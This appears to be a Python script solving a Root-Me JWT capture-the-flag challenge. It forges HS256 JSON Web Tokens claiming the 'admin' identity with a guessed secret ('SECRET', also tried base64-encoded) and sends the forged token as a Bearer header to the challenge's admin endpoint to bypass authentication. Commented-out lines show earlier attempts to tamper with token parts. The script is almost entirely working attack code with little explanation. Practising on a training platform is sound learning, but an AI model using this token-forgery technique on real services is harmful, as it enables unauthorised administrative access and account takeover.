· 5 years ago · Aug 29, 2020, 10:28 AM
1import requests
2import json
3import jwt
4import base64
5
6
7secret_key = "SECRET"
8tokensign = jwt.encode({
9 "jti": "24300e07-694d-45e6-bf29-967a4ad2e8basd",
10 "iat": 1598629291,
11 "identity": "admin",
12 "nbf": 1598629291,
13 "exp": 30330393,
14 "type": "access",
15 "fresh": "false"
16}, secret_key, algorithm='HS256').decode('utf-8')
17
18
19#datas = {'username':'admin', 'password': 'admin'}
20
21#r = requests.post('http://challenge01.root-me.org//web-serveur/ch63/login', json = {"username":"admin","password":"admin"})
22
23#server_resp = r.content.decode()
24#serverjson = json.loads(server_resp)
25#token = serverjson['access_token']
26
27
28tokenspec = jwt.encode(
29{
30 "exp": 1598696280,
31 "identity": "admin",
32 "iat": 1598696100,
33 "nbf": 1598696100,
34 "jti": "021c2f7e-d750-4e5c-b640-ee578bad67ze",
35 "type": "access",
36 "fresh": "false"
37}, base64.b64encode(secret_key), algorithm='HS256').decode('utf-8')
38
39
40#toktok = jwt.encode(token, 'secret', algorithms=['HS256'])
41print(tokenspec)
42#print token;
43
44#token = token.replace(token.split('.')[2], (token.split('.')[2]))
45
46
47#test = base64.urlsafe_b64encode("HMACSHA256(" + base64.urlsafe_b64encode( token.split('.')[0] ) + "." + base64.urlsafe_b64encode( token.split('.')[1] ) + ")" )
48
49
50#token2 = token.replace(token.split('.')[0], "eyJhbGciOiJIUzI1NiJ9")
51#token2 = token.replace(token.split('.')[1], "eyJhbGciOiJIUzI1NiJ9")
52#token2 = token.replace(token.split('.')[2], "zx6HBDrIo9VZRPd6KfHNWY-9VC7ngvFjRDEUa7kfX1A")
53
54
55#print("TOKEN " + token +"\n")
56#print("TOKEN2 " + token2)
57
58result = requests.get('http://challenge01.root-me.org//web-serveur/ch63/admin', headers = {'Authorization': 'Bearer {}'.format(tokenspec)})
59
60
61print(result)
62print(result.content.decode())
63
64#print(server_resp)
65